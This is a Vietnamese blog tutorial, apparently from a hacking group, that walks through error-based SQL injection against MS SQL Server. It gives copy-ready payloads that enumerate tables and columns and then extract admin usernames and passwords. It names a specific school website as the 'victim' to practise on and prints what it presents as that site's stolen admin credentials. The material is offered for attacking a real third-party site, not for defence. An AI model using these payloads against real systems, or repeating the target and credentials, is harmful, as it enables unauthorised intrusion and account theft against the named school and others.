Cũng giông như các dạng khác ta thêm dấu " ' " vào đuôi link hoặc vào thanh tìm kiếm của web site để biết site có lỗi hay không
----> victim cho các bạn test: thptnguyenthaibinh.edu.vn
~~~~~Làm từng bước theo tut nhé
++++Tim version: 'and 1=convert(int,(@@version))-- -
++++Tim database: 'and 1=convert(int,(db_name()))-- -
++++tim thong tin table:
'and 1=convert(int,(select top 1 table_name from information_schema.tables))-- - (1)
++++tim cac table khac table da tim dc o tren(1)
'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('các table t`im đc')))-- -
****tai sao phải them (((where table_name not in ))) ý nghĩa la tim các table khac ngoai cac table da tim dc
----Tìm cho đến khi tìm đc cái table như: admin,user,....)thì dùng lại
@vd :'admin'
bay giờ tim ra admin r thi dừng lại (chưa t`im đc th`i cứ t`im ti^ếp)
----->tiếp theo ta:
++++Tìm thông tin table 'admin' vừa tìm đc
ta đang khai thác table 'admin'
nen dong lệnh sẽ thay đổi
'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin')))-- -
@ví dụ tim đc từ 'admin': là 'ID' thì:
----Ta làm tương tụ như ở trên
'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('admin') and column_name not(khác) in ('ID')))-- - delete từ khác đi nhé
Ta khai thác đến khi naò tìm đc :
-ở đây thì mình khai thác đc là :username và password
?:roi lam sao co user va pass
TA dùng lệnh cụ thể trong table username và password
'and 1=convert(int,(select top 1 username from admin))-- - để biết tài khoản
'and 1=convert(int,(select top 1 password from admin))-- - để biết mật khẩu
username: 'admin'
password: 'bongbi0917343846'
%%%%%TUT VIẾT BỚI MINH TRỰC ---GLOOMY HACKING TEAM (GHT)%%%%%%
EDIT BY Jo3
0 nhận xét :
Đăng nhận xét